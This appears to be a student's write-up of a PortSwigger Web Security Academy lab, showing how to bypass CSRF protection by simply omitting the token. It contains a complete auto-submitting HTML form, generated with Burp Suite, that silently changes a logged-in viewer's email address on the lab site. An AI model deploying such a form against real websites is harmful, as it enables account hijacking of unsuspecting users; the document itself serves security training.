Lab: CSRF where token validation depends on token being present

tags: Portswigger Web Security Academy Web

• Description: This lab’s email change functionality is vulnerable to CSRF.
• Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

You can log in to your own account using the following credentials: wiener:peter

Recon

1. Login and update email to trace the package

   It’s very similar with previous lab $\to$ it contained CSRF_token as its carried data:

2. Try to use 1st method to bypass It seems can work properly.

Exp - Delete CSRF_token directly to bypass

Actually, this is totally the same with the first lab’s payload

Exploit Payload:

1 2 3 4 5 6 7 8 9 10 11 12 13

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="https://0aa70059042bf55d80101c7a00930051.web-security-academy.net/my-account/change-email" method="POST"> <input type="hidden" name="email" value="danger&#64;gmail&#46;com" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Reference

• Lab: CSRF where token validation depends on token being present:CSRF
• 从0到1完全掌握 CSRF